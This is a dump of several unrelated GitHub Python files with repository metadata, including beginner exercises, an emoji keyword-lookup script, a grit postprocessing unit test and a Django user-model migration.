58be9ab3da7170fa6eea7c12a6d59e4960db3c66
|
/alumnos/Luis Omar/Actividad 02/Actividad-4.py
|
ed06d854f235496b0664261a1e9e191effe05757
|
[] |
no_license
|
CodevEnsenada/actividades
|
08d39b9b53d8c10ad17204fa9ac5e313a940a4b3
|
862d6f983b7056957522d28686df1b0a323a9e6f
|
refs/heads/master
| 2022-04-09T03:47:32.373978 | 2020-03-16T20:17:14 | 2020-03-16T20:17:14 | 241,519,981 | 0 | 12 | null | 2020-03-16T20:17:15 | 2020-02-19T03:03:48 |
Python
|
UTF-8
|
Python
| false | false | 36 |
py
|
#act.4
a=18
b=2
suma=a+b
print(suma)
|
[
"[email protected]"
] | |
88602e1e0e2ef39da01887596a86e434b79e849e
|
028afaa205e46e0db61707a84860fa5e34bd61aa
|
/my_emoji.py
|
50ffaaed40c18a77aaf96e8211a5dc06a70dfe55
|
[] |
no_license
|
muriel27/mojo_python
|
d4f32142e9817621a319e3d4cbcc89d3a9771ddb
|
c5488d6d35992e932f91f5cae58a87515b0ee77e
|
refs/heads/master
| 2021-01-20T20:08:07.036918 | 2016-06-27T02:56:21 | 2016-06-27T02:56:21 | 61,265,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,119 |
py
|
#__author__ = 'mjwei'
from enum import Enum
import os
import operator
import random
class Category(Enum):
People = 'people'
Face ='face'
CatFace ='catFace'
MonkeyFace = 'monkeyFace'
Transport = 'transport'
Symbol = 'symbol'
Animal = 'animal'
Others = 'others'
Plant = 'plant'
Fruit = 'fruit'
Food = 'food'
Drink = 'drink'
Instruments = 'instruments'
Sport = 'sport'
Building = 'building'
Features = 'features'
Direction = 'direction'
Hand = 'hand'
class Emoji(Enum):
Grin = ('\U0001F601', Category.Face.name, ['happy','joy','grad'])
Tear = ('\U0001F602', Category.Face.name, ['happy','joy','grad'])
Smile = ('\U0001F603', Category.Face.name, ['happy','joy','grad','smiling'])
Sweat = ('\U0001F605', Category.Face.name, ['happy','joy','grad','smiling'])
XD = ('\U0001F606', Category.Face.name, ['happy','joy','grad','smiling'])
Wink = ('\U0001F609', Category.Face.name, ['happy','joy','grad','smiling'])
Savor = ('\U0001F60B', Category.Face.name, ['happy','joy','grad','smiling'])
Relieve = ('\U0001F60C', Category.Face.name, ['none'])
HeartShaped = ('\U0001F60D', Category.Face.name, ['love','happy','joy','grad','smiling'])
Smirk = ('\U0001F60F', Category.Face.name, ['none'])
Unamused = ('\U0001F612', Category.Face.name, ['none'])
ColdSweat = ('\U0001F613', Category.Face.name, ['none'])
Pensive = ('\U0001F614', Category.Face.name, ['none'])
Confound = ('\U0001F616', Category.Face.name, ['confuse','puzzle'])
Kiss = ('\U0001F618', Category.Face.name, ['none'])
TongueFace = ('\U0001F61C',Category.Face.name, ['wink','stuck-out'])
ClosedEyes = ('\U0001F61D', Category.Face.name, ['none'])
Disappoint = ('\U0001F61E', Category.Face.name, ['none'])
Angry = ('\U0001F620', Category.Face.name, ['none'])
Pout = ('\U0001F621', Category.Face.name, ['none'])
SadCry = ('\U0001F622', Category.Face.name, ['none'])
Worry = ('\U0001F623', Category.Face.name, ['worried','persevere','persevering'])
Triumph = ('\U0001F624', Category.Face.name, ['none'])
Relieved = ('\U0001F625', Category.Face.name, ['disappoint'])
Fear = ('\U0001F628', Category.Face.name, ['none'])
Weary = ('\U0001F629', Category.Face.name, ['none'])
Sleep = ('\U0001F62A', Category.Face.name, ['none'])
Tired = ('\U0001F62B', Category.Face.name, ['none'])
LoudCry = ('\U0001F62D', Category.Face.name, ['none'])
Scream = ('\U0001F631', Category.Face.name, ['fear','shock','scare'])
Astonished = ('\U0001F632', Category.Face.name, ['shock'])
Flushed = ('\U0001F633', Category.Face.name, ['blush'])
Dizzy = ('\U0001F635', Category.Face.name, ['none'])
MedicalMask = ('\U0001F637', Category.Face.name, ['ill','sick'])
GrinCat = ('\U0001F638', Category.CatFace.name, ['happy','joy','grad'])
TearCat = ('\U0001F639', Category.CatFace.name, ['happy','joy','grad'])
SmileCat = ('\U0001F63A', Category.CatFace.name, ['happy','joy','grad','smiling'])
HeartShapedCat = ('\U0001F63B', Category.CatFace.name, ['love','happy','joy','grad','smiling'])
WrySmileCat = ('\U0001F63C', Category.CatFace.name, ['none'])
KissCat = ('\U0001F63D', Category.CatFace.name, ['none'])
PoutCat = ('\U0001F63E', Category.CatFace.name, ['none'])
SadCryCat = ('\U0001F63F', Category.CatFace.name, ['none'])
NoGoodGesture = ('\U0001F645', Category.People.name, ['object','deny'])
OkGesture = ('\U0001F646', Category.People.name, ['agree','yes'])
Bowing = ('\U0001F647', Category.People.name, ['kneel'])
SeeNoEvilMonkey = ('\U0001F648', Category.MonkeyFace.name, ['none'])
HearNoEvilMonkey = ('\U0001F649', Category.MonkeyFace.name, ['none'])
SpeakNoEvilMonkey = ('\U0001F64A', Category.MonkeyFace.name, ['none'])
RaiseOneHand = ('\U0001F64B', Category.Face.name, ['raising'])
RaiseBothHand = ('\U0001F64C', Category.Face.name, ['raising'])
Frown = ('\U0001F64D', Category.Face.name, ['none'])
FoldedHands = ('\U0001F64F', Category.Face.name, ['none'])
Rocket = ('\U0001F680', Category.Transport.name, ['none'])
RailwayCar = ('\U0001F683', Category.Transport.name, ['none'])
HighSpeed = ('\U0001F684', Category.Transport.name, ['train'])
HighSpeedBullet = ('\U0001F685', Category.Transport.name, ['train'])
Metro = ('\U0001F687', Category.Transport.name, ['none'])
Station = ('\U0001F689', Category.Transport.name, ['none'])
Bus = ('\U0001F68C', Category.Transport.name, ['none'])
BusStop = ('\U0001F68F', Category.Transport.name, ['none'])
Ambulance = ('\U0001F691', Category.Transport.name, ['none'])
FireEngine = ('\U0001F692', Category.Transport.name, ['none'])
PoliceCar = ('\U0001F693', Category.Transport.name, ['none'])
Taxi = ('\U0001F695', Category.Transport.name, ['none'])
Automobile = ('\U0001F697', Category.Transport.name, ['car'])
RecreationalVehicle = ('\U0001F699', Category.Transport.name, ['none'])
DeliveryTruck = ('\U0001F69A', Category.Transport.name, ['none'])
Ship = ('\U0001F6A2', Category.Transport.name, ['none'])
Speedboat = ('\U0001F6A4', Category.Transport.name, ['none'])
TrafficLight = ('\U0001F6A5', Category.Transport.name, ['horizontal'])
ConstructionSign = ('\U0001F6A7', Category.Transport.name, ['none'])
RevolvingLight = ('\U0001F6A8', Category.Transport.name, ['none'])
TriangularFlag = ('\U0001F6A9', Category.Transport.name, ['on post'])
Door = ('\U0001F6AA', Category.Transport.name, ['none'])
NoEntry = ('\U0001F6AB', Category.Symbol.name, ['none'])
SmokingSymbol = ('\U0001F6AC', Category.Symbol.name, ['sign'])
NoSmokingSymbol = ('\U0001F6AD', Category.Symbol.name, ['sign'])
Bicycle = ('\U0001F6B2', Category.Transport.name, ['sign'])
Pedestrian = ('\U0001F6B6', Category.Transport.name, ['sign'])
MenSymbol = ('\U0001F6B9', Category.Symbol.name, ['sign'])
WomenSymbol = ('\U0001F6BA', Category.Symbol.name, ['sign'])
Restroom = ('\U0001F6BB', Category.Symbol.name, ['bathroom'])
BabySymbol = ('\U0001F6BC', Category.Symbol.name, ['sign'])
Toilet = ('\U0001F6BD', Category.Symbol.name, ['bathroom','restroom'])
WaterCloset = ('\U0001F6BE', Category.Symbol.name, ['wc'])
Bath = ('\U0001F6C0', Category.Symbol.name, ['sign'])
Rat = ('\U0001F400', Category.Animal.name, ['none'])
Mouse = ('\U0001F401', Category.Animal.name, ['none'])
Ox = ('\U0001F402', Category.Animal.name, ['none'])
WaterBuffalo = ('\U0001F403', Category.Animal.name, ['none'])
Cow = ('\U0001F404', Category.Animal.name, ['none'])
Tiger = ('\U0001F405', Category.Animal.name, ['none'])
Leopard = ('\U0001F406', Category.Animal.name, ['none'])
Rabbit = ('\U0001F407', Category.Animal.name, ['none'])
Cat = ('\U0001F408', Category.Animal.name, ['none'])
Dragon = ('\U0001F409', Category.Animal.name, ['none'])
Crocodile = ('\U0001F40A', Category.Animal.name, ['none'])
Whale = ('\U0001F40B', Category.Animal.name, ['none'])
Ram = ('\U0001F40F', Category.Animal.name, ['none'])
Goat = ('\U0001F410', Category.Animal.name, ['none'])
Rooster = ('\U0001F413', Category.Animal.name, ['none'])
Dog = ('\U0001F415', Category.Animal.name, ['none'])
Pig = ('\U0001F416', Category.Animal.name, ['none'])
Camel = ('\U0001F42A', Category.Animal.name, ['none'])
Watch = ('\U0000231A', Category.Others.name, ['none'])
Hourglass = ('\U0000231B', Category.Others.name, ['none'])
AlarmClock = ('\U000023F0', Category.Others.name, ['none'])
Cloud = ('\U00002600', Category.Others.name, ['none'])
Sun = ('\U00002601', Category.Others.name, ['none'])
Telephone = ('\U0000260E', Category.Others.name, ['none'])
Umbrella = ('\U00002614', Category.Others.name, ['none'])
Cafe = ('\U00002615', Category.Others.name, ['coffee','beverage','hot'])
WarningSign = ('\U000026A0', Category.Symbol.name, ['notice'])
HighVoltageSign = ('\U000026A1', Category.Symbol.name, ['lightning'])
Soccer = ('\U000026BD', Category.Others.name, ['football'])
Snowman = ('\U000026C4', Category.Others.name, ['none'])
Church = ('\U000026EA', Category.Others.name, ['none'])
Sailboat = ('\U000026F5', Category.Others.name, ['none'])
FuelPump = ('\U000026FD', Category.Others.name, ['none'])
Star = ('\U00002B50', Category.Others.name, ['none'])
Moon = ('\U0001F319', Category.Others.name, ['none'])
Seed = ('\U0001F331', Category.Plant.name, ['none'])
Palm = ('\U0001F334', Category.Others.name, ['tree'])
Cactus = ('\U0001F335', Category.Others.name, ['none'])
Tulip = ('\U0001F337', Category.Others.name, ['none'])
CherryBlossom = ('\U0001F338', Category.Others.name, ['none'])
Rose = ('\U0001F339', Category.Others.name, ['none'])
Hibiscus = ('\U0001F33A', Category.Others.name, ['none'])
Sunflower = ('\U0001F33B', Category.Others.name, ['none'])
Blossom = ('\U0001F33C', Category.Others.name, ['none'])
Maize = ('\U0001F33D', Category.Others.name, ['corn'])
Rice = ('\U0001F33E', Category.Others.name, ['none'])
Herb = ('\U0001F33F', Category.Others.name, ['none'])
FourLeafClover = ('\U0001F340', Category.Others.name, ['none'])
Maple = ('\U0001F341', Category.Others.name, ['leaf'])
FallenLeaf = ('\U0001F342', Category.Others.name, ['none'])
Mushroom = ('\U0001F344', Category.Others.name, ['none'])
Tomato = ('\U0001F345', Category.Others.name, ['none'])
Aubergine = ('\U0001F346', Category.Others.name, ['none'])
Grapes = ('\U0001F347', Category.Fruit.name, ['none'])
Melon = ('\U0001F348', Category.Fruit.name, ['none'])
Watermelon = ('\U0001F349', Category.Fruit.name, ['none'])
Tangerine = ('\U0001F34A', Category.Fruit.name, ['none'])
Banana = ('\U0001F34C', Category.Fruit.name, ['none'])
Pineapple = ('\U0001F34D', Category.Fruit.name, ['none'])
RedApple = ('\U0001F34E', Category.Fruit.name, ['none'])
GreenApple = ('\U0001F34F', Category.Fruit.name, ['none'])
Peach = ('\U0001F351', Category.Fruit.name, ['none'])
Cherries = ('\U0001F352', Category.Fruit.name, ['none'])
Strawberry = ('\U0001F353', Category.Fruit.name, ['none'])
Hamburger = ('\U0001F354', Category.Food.name, ['none'])
Pizza = ('\U0001F355', Category.Food.name, ['none'])
Bone = ('\U0001F356', Category.Food.name, ['meat'])
PoultryLeg = ('\U0001F357', Category.Food.name, ['none'])
RiceCracker = ('\U0001F358', Category.Food.name, ['none'])
RiceBall = ('\U0001F359', Category.Food.name, ['none'])
CookedRice = ('\U0001F35A', Category.Food.name, ['none'])
CurryRice = ('\U0001F35B', Category.Food.name, ['none'])
SteamingBowl = ('\U0001F35C', Category.Food.name, ['none'])
Spaghetti = ('\U0001F35D', Category.Food.name, ['none'])
Bread = ('\U0001F35E', Category.Food.name, ['none'])
FrenchFries = ('\U0001F35F', Category.Food.name, ['none'])
SweetPotato = ('\U0001F35E', Category.Food.name, ['none'])
Dango = ('\U0001F361', Category.Food.name, ['none'])
Oden = ('\U0001F362', Category.Food.name, ['none'])
Sushi = ('\U0001F363', Category.Food.name, ['none'])
FriedShrimp = ('\U0001F364', Category.Food.name, ['none'])
FishCake = ('\U0001F365', Category.Food.name, ['none'])
IceCream = ('\U0001F366', Category.Food.name, ['none'])
ShavedIce = ('\U0001F367', Category.Food.name, ['none'])
Doughnut = ('\U0001F369', Category.Food.name, ['none'])
Cookie = ('\U0001F36A', Category.Food.name, ['none'])
Chocolate = ('\U0001F36B', Category.Food.name, ['none'])
Candy = ('\U0001F36C', Category.Food.name, ['none'])
Lollipop = ('\U0001F36D', Category.Food.name, ['none'])
Custard = ('\U0001F36E', Category.Food.name, ['none'])
Honey = ('\U0001F36F', Category.Food.name, ['none'])
Shortcake = ('\U0001F370', Category.Food.name, ['cake'])
Bento = ('\U0001F371', Category.Food.name, ['box'])
Pot = ('\U0001F372', Category.Food.name, ['none'])
Cook = ('\U0001F373', Category.Food.name, ['none'])
ForkKnife = ('\U0001F374', Category.Food.name, ['none'])
Wine = ('\U0001F377', Category.Drink.name, ['none'])
Cocktail = ('\U0001F378', Category.Drink.name, ['none'])
Tropical = ('\U0001F379', Category.Drink.name, ['none'])
Beer = ('\U0001F37A', Category.Drink.name, ['none'])
Ribbon = ('\U0001F380', Category.Others.name, ['none'])
Present = ('\U0001F381', Category.Others.name, ['none'])
JackOLantern = ('\U0001F383', Category.Others.name, ['none'])
ChristmasTree = ('\U0001F384', Category.Others.name, ['none'])
FatherChristmas = ('\U0001F385', Category.Others.name, ['none'])
Fireworks = ('\U0001F386', Category.Others.name, ['none'])
Balloon = ('\U0001F388', Category.Others.name, ['none'])
WindChime = ('\U0001F390', Category.Others.name, ['none'])
SchoolSatchel = ('\U0001F392', Category.Others.name, ['none'])
GraduationCap = ('\U0001F393', Category.Others.name, ['none'])
Microphone = ('\U0001F3A4', Category.Others.name, ['none'])
Camera = ('\U0001F3A5', Category.Others.name, ['none'])
Palette = ('\U0001F3A8', Category.Others.name, ['none'])
Hat = ('\U0001F3A9', Category.Others.name, ['none'])
Circus = ('\U0001F3AA', Category.Others.name, ['tent'])
Ticket = ('\U0001F3AB', Category.Others.name, ['none'])
ClapperBoard = ('\U0001F3AC', Category.Others.name, ['none'])
VideoGame = ('\U0001F3AE', Category.Others.name, ['none'])
SlotMachine = ('\U0001F3B0', Category.Others.name, ['none'])
GameDie = ('\U0001F3B2', Category.Others.name, ['none'])
Bowling = ('\U0001F3B3', Category.Others.name, ['none'])
MusicalNote = ('\U0001F3B5', Category.Instruments.name, ['none'])
Saxophone = ('\U0001F3B7', Category.Instruments.name, ['none'])
Guitar = ('\U0001F3B8', Category.Instruments.name, ['none'])
Keyboard = ('\U0001F3B9', Category.Instruments.name, ['none'])
Trumpet = ('\U0001F3BA', Category.Instruments.name, ['none'])
Violin = ('\U0001F3BB', Category.Instruments.name, ['none'])
MusicalScore = ('\U0001F3BC', Category.Instruments.name, ['none'])
Tennis = ('\U0001F3BE', Category.Sport.name, ['none'])
SkiBoot = ('\U0001F3BF', Category.Sport.name, ['none'])
Basketball = ('\U0001F3C0', Category.Sport.name, ['hoop'])
ChequeredFlag = ('\U0001F3C1', Category.Sport.name, ['none'])
Snowboarder = ('\U0001F3C2', Category.Sport.name, ['none'])
Runner = ('\U0001F3C3', Category.Sport.name, ['none'])
Surfer = ('\U0001F3C4', Category.Sport.name, ['none'])
Trophy = ('\U0001F3C6', Category.Sport.name, ['none'])
AmericanFootball = ('\U0001F3C8', Category.Sport.name, ['none'])
Swimmer = ('\U0001F3CA', Category.Sport.name, ['none'])
House = ('\U0001F3E1', Category.Building.name, ['none'])
Office = ('\U0001F3E2', Category.Building.name, ['none'])
Hospital = ('\U0001F3E5', Category.Building.name, ['none'])
Bank = ('\U0001F3E6', Category.Building.name, ['none'])
ATM = ('\U0001F3E7', Category.Building.name, ['none'])
Hotel = ('\U0001F3E8', Category.Building.name, ['none'])
ConvenienceStore = ('\U0001F3EA', Category.Building.name, ['none'])
School = ('\U0001F3EB', Category.Building.name, ['none'])
Department = ('\U0001F3EC', Category.Building.name, ['none'])
Factory = ('\U0001F3ED', Category.Building.name, ['none'])
Snail = ('\U0001F40C', Category.Animal.name, ['none'])
Snake = ('\U0001F40D', Category.Animal.name, ['none'])
Horse = ('\U0001F40E', Category.Animal.name, ['none'])
Sheep = ('\U0001F411', Category.Animal.name, ['none'])
Monkey = ('\U0001F412', Category.Animal.name, ['none'])
Chicken = ('\U0001F414', Category.Animal.name, ['none'])
Boar = ('\U0001F417', Category.Animal.name, ['none'])
Elephant = ('\U0001F418', Category.Animal.name, ['none'])
Octopus = ('\U0001F419', Category.Animal.name, ['none'])
SpiralShell = ('\U0001F41A', Category.Animal.name, ['none'])
Bug = ('\U0001F41B', Category.Animal.name, ['none'])
Ant = ('\U0001F41C', Category.Animal.name, ['none'])
Honeybee = ('\U0001F41D', Category.Animal.name, ['none'])
LadyBeetle = ('\U0001F41E', Category.Animal.name, ['none'])
Fish = ('\U0001F41F', Category.Animal.name, ['none'])
TropicalFish = ('\U0001F420', Category.Animal.name, ['none'])
Blowfish = ('\U0001F421', Category.Animal.name, ['none'])
Turtle = ('\U0001F422', Category.Animal.name, ['none'])
HatchingChick = ('\U0001F423', Category.Animal.name, ['none'])
BabyChick = ('\U0001F424', Category.Animal.name, ['none'])
Bird = ('\U0001F426', Category.Animal.name, ['none'])
Penguin = ('\U0001F427', Category.Animal.name, ['none'])
Koala = ('\U0001F428', Category.Animal.name, ['none'])
Poodle = ('\U0001F429', Category.Animal.name, ['none'])
Dolphin = ('\U0001F42C', Category.Animal.name, ['none'])
MouseFace = ('\U0001F42D', Category.Animal.name, ['none'])
CowFace = ('\U0001F42E', Category.Animal.name, ['none'])
TigerFace = ('\U0001F42F', Category.Animal.name, ['none'])
RabbitFace = ('\U0001F430', Category.Animal.name, ['none'])
CatFace = ('\U0001F431', Category.Animal.name, ['none'])
DragonFace = ('\U0001F432', Category.Animal.name, ['none'])
SpoutingWhale = ('\U0001F433', Category.Animal.name, ['none'])
HorseFace = ('\U0001F434', Category.Animal.name, ['none'])
MonkeyFace = ('\U0001F435', Category.Animal.name, ['none'])
DogFace = ('\U0001F436', Category.Animal.name, ['none'])
PigFace = ('\U0001F437', Category.Animal.name, ['none'])
FrogFace = ('\U0001F438', Category.Animal.name, ['none'])
HamsterFace = ('\U0001F439', Category.Animal.name, ['none'])
WolfFace = ('\U0001F43A', Category.Animal.name, ['none'])
BearFace = ('\U0001F43B', Category.Animal.name, ['none'])
PandaFace = ('\U0001F43C', Category.Animal.name, ['none'])
PigNose = ('\U0001F43D', Category.Animal.name, ['none'])
PawPrints = ('\U0001F43E', Category.Animal.name, ['none'])
Eyes = ('\U0001F440', Category.Features.name, ['none'])
Ear = ('\U0001F442', Category.Features.name, ['none'])
Nose = ('\U0001F443', Category.Features.name, ['none'])
Mouth = ('\U0001F444', Category.Features.name, ['none'])
Tongue = ('\U0001F445', Category.Features.name, ['none'])
Up = ('\U0001F446', Category.Direction.name, ['none'])
Down = ('\U0001F447', Category.Direction.name, ['none'])
Left = ('\U0001F448', Category.Direction.name, ['none'])
Right = ('\U0001F449', Category.Direction.name, ['none'])
FistedHand = ('\U0001F44A', Category.Hand.name, ['none'])
WavingHand = ('\U0001F44B', Category.Hand.name, ['none'])
OK = ('\U0001F44C', Category.Hand.name, ['none'])
ThumbsUp = ('\U0001F44D', Category.Hand.name, ['none'])
ThumbsDown = ('\U0001F44E', Category.Hand.name, ['none'])
ClappingHands = ('\U0001F44F', Category.Hand.name, ['none'])
OpenHands = ('\U0001F450', Category.Hand.name, ['none'])
Crown = ('\U0001F451', Category.Others.name, ['none'])
Eyeglasses = ('\U0001F453', Category.Others.name, ['none'])
Necktie = ('\U0001F454', Category.Others.name, ['none'])
Tshirt = ('\U0001F455', Category.Others.name, ['none'])
Jeans = ('\U0001F456', Category.Others.name, ['none'])
Dress = ('\U0001F457', Category.Others.name, ['none'])
Kimono = ('\U0001F458', Category.Others.name, ['none'])
Bikini = ('\U0001F459', Category.Others.name, ['none'])
WomansClothes = ('\U0001F45A', Category.Others.name, ['none'])
Purse = ('\U0001F45B', Category.Others.name, ['none'])
Handbag = ('\U0001F45C', Category.Others.name, ['none'])
Pouch = ('\U0001F45D', Category.Others.name, ['none'])
MansShoe = ('\U0001F45E', Category.Others.name, ['none'])
AthleticShoe = ('\U0001F45F', Category.Others.name, ['none'])
HighHeeledShoe = ('\U0001F460', Category.Others.name, ['none'])
SandalShoe = ('\U0001F461', Category.Others.name, ['none'])
BootsShoe = ('\U0001F462', Category.Others.name, ['none'])
Footprints = ('\U0001F463', Category.Others.name, ['none'])
Boy = ('\U0001F466', Category.People.name, ['none'])
Girl = ('\U0001F467', Category.People.name, ['none'])
Man = ('\U0001F468', Category.People.name, ['none'])
Woman = ('\U0001F469', Category.People.name, ['none'])
Family = ('\U0001F46A', Category.People.name, ['none'])
Couple = ('\U0001F46B', Category.People.name, ['none'])
Police = ('\U0001F46E', Category.People.name, ['officer'])
Bride = ('\U0001F470', Category.People.name, ['none'])
Baby = ('\U0001F476', Category.People.name, ['infant'])
Princess = ('\U0001F478', Category.People.name, ['none'])
Ghost = ('\U0001F47B', Category.Others.name, ['none'])
Skull = ('\U0001F480', Category.Others.name, ['none'])
Guardsman = ('\U0001F482', Category.People.name, ['none'])
Dancer = ('\U0001F483', Category.People.name, ['none'])
Lipstick = ('\U0001F484', Category.Others.name, ['none'])
Syringe = ('\U0001F489', Category.Others.name, ['none'])
Pill = ('\U0001F48A', Category.Others.name, ['none'])
Ring = ('\U0001F48D', Category.Others.name, ['none'])
Gem = ('\U0001F48E', Category.Others.name, ['none'])
BrokenHeart = ('\U0001F494', Category.Others.name, ['none'])
Heart = ('\U0001F49C', Category.Others.name, ['none'])
Bulb = ('\U0001F4A1', Category.Others.name, ['light'])
Anger = ('\U0001F4A2', Category.Others.name, ['none'])
Bomb = ('\U0001F4A3', Category.Others.name, ['none'])
Sleeping = ('\U0001F4A4', Category.Others.name, ['none'])
PileOfPoo = ('\U0001F4A9', Category.Others.name, ['none'])
Money = ('\U0001F4B0', Category.Others.name, ['none'])
CreditCard = ('\U0001F4B3', Category.Others.name, ['none'])
Computer = ('\U0001F4BB', Category.Others.name, ['none'])
Disk = ('\U0001F4BE', Category.Others.name, ['none'])
Calendar = ('\U0001F4C5', Category.Others.name, ['none'])
Clipboard = ('\U0001F4CB', Category.Others.name, ['none'])
Pushpin = ('\U0001F4CC', Category.Others.name, ['none'])
Paperclip = ('\U0001F4CE', Category.Others.name, ['none'])
Notebook = ('\U0001F4D3', Category.Others.name, ['none'])
Memo = ('\U0001F4DD', Category.Others.name, ['none'])
Postbox = ('\U0001F4EE', Category.Others.name, ['none'])
Newspaper = ('\U0001F4F0', Category.Others.name, ['none'])
Mobile = ('\U0001F4F1', Category.Others.name, ['phone'])
Television = ('\U0001F4FA', Category.Others.name, ['none'])
Radio = ('\U0001F4FB', Category.Others.name, ['none'])
Plug = ('\U0001F50C', Category.Others.name, ['none'])
Key = ('\U0001F511', Category.Others.name, ['none'])
Lock = ('\U0001F512', Category.Others.name, ['none'])
Bell = ('\U0001F514', Category.Others.name, ['none'])
Button = ('\U0001F518', Category.Others.name, ['none'])
Wrench = ('\U0001F527', Category.Others.name, ['none'])
Hammer = ('\U0001F528', Category.Others.name, ['none'])
Pistol = ('\U0001F52B', Category.Others.name, ['gun'])
#transfer enter words to Emoji
def to_emoji(enter):
flag = False
for emoji in Emoji:
#find the corresponding word at Emoji.name
if(enter.find(emoji.name.lower()) >= 0 ):
flag = True
print((emoji.value)[0])
break
#find the corresponding word at Emoji.value[2] which is extra description
emotion_tup = emoji.value
for description in emotion_tup[2]:
if(enter.find(description) >= 0 or description.find(enter) >=0):
flag = True
print((emoji.value)[0])
break
if flag:
break
if flag is not True:
#random select from the emoji list with same category
emoji_list = searchCategory(enter)
if(len(emoji_list)>0):
flag =True
print(random.choice(emoji_list))
# default emoji if no corresponding emoji can be found
if flag is not True:
print('\U0001F631')
#find the corresponding word at category name
def searchCategory(enter):
emoji_list = []
for emoji in Emoji:
category=(emoji.value)[1]
if(category.lower().find(enter) >=0):
emoji_list.append((emoji.value)[0])
return emoji_list
while True:
enter = input("Please key in here :")
if enter=='':
break
to_emoji(enter.lower())
|
[
"[email protected]"
] | |
624253db8803ba4e60460ddc4c11d392b0bac60d
|
297497957c531d81ba286bc91253fbbb78b4d8be
|
/third_party/libwebrtc/tools/grit/grit/tool/postprocess_unittest.py
|
21ca5e2f774610e4a7efa36f398ec1fb87b4cddc
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
marco-c/gecko-dev-comments-removed
|
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
|
61942784fb157763e65608e5a29b3729b0aa66fa
|
refs/heads/master
| 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 |
NOASSERTION
| 2019-09-29T01:27:49 | 2019-09-27T10:44:24 |
C++
|
UTF-8
|
Python
| false | false | 1,705 |
py
|
'''Unit test that checks postprocessing of files.
Tests postprocessing by having the postprocessor
modify the grd data tree, changing the message name attributes.
'''
from __future__ import print_function
import os
import re
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
import grit.tool.postprocess_interface
from grit.tool import rc2grd
class PostProcessingUnittest(unittest.TestCase):
def testPostProcessing(self):
rctext = '''STRINGTABLE
BEGIN
DUMMY_STRING_1 "String 1"
// Some random description
DUMMY_STRING_2 "This text was added during preprocessing"
END
'''
tool = rc2grd.Rc2Grd()
class DummyOpts(object):
verbose = False
extra_verbose = False
tool.o = DummyOpts()
tool.post_process = 'grit.tool.postprocess_unittest.DummyPostProcessor'
result = tool.Process(rctext, '.\resource.rc')
self.failUnless(
result.children[2].children[2].children[0].attrs['name'] == 'SMART_STRING_1')
self.failUnless(
result.children[2].children[2].children[1].attrs['name'] == 'SMART_STRING_2')
class DummyPostProcessor(grit.tool.postprocess_interface.PostProcessor):
'''
Post processing replaces all message name attributes containing "DUMMY" to
"SMART".
'''
def Process(self, rctext, rcpath, grdnode):
smarter = re.compile(r'(DUMMY)(.*)')
messages = grdnode.children[2].children[2]
for node in messages.children:
name_attr = node.attrs['name']
m = smarter.search(name_attr)
if m:
node.attrs['name'] = 'SMART' + m.group(2)
return grdnode
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
7dc45d66e98d4d7f6520c961a275e8f2cca368d4
|
80ab3312d7bbe514d1e7b3452fdd9c25d542f079
|
/collection/list/converting2.py
|
b5fb44d42103d62a6f045095b5aacbbefcdca91a
|
[] |
no_license
|
krishnanandk/kkprojects
|
2e7e993475b10696b05873a15df997ddf46931a1
|
dd5d96ad7af9f8632648e833fcae87951ca431de
|
refs/heads/master
| 2023-04-09T04:08:23.077215 | 2021-04-19T04:56:11 | 2021-04-19T04:56:11 | 359,332,372 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 94 |
py
|
lst=[5,10,20]
print(lst)
lst1=[]
sum=sum(lst)
for i in lst:
lst1.append(sum-i)
print(lst1)
|
[
"[email protected]"
] | |
f2744c340d84c765a7f38427e107dcf0e0339605
|
6ba72ce01fe8c08a10a7607536858cfd40b2dc16
|
/kirppuauth/migrations/0001_initial.py
|
a501f184d3eaff89282c7871370678d0bb60b7eb
|
[
"MIT"
] |
permissive
|
jlaunonen/kirppu
|
dcafc5537d325b2605daf98cdde4115a759dd2ce
|
fb694a0d1f827f4f4aae870589eb4e57ddf9bc97
|
refs/heads/master
| 2023-07-20T03:13:10.814349 | 2023-07-14T16:46:55 | 2023-07-14T16:46:55 | 18,244,187 | 0 | 6 |
MIT
| 2023-01-10T20:48:08 | 2014-03-29T15:36:30 |
Python
|
UTF-8
|
Python
| false | false | 2,830 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, max_length=30, verbose_name='username', validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username.', 'invalid')])),
('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),
('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),
('email', models.EmailField(max_length=75, verbose_name='email address', blank=True)),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('phone', models.CharField(max_length=64)),
('last_checked', models.DateTimeField(auto_now_add=True)),
('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', verbose_name='groups')),
('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),
],
options={
'abstract': False,
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
bases=(models.Model,),
),
]
|
[
"[email protected]"
] | |
1f41f472eff20d97f50cfe622768cb7a07752ec7
|
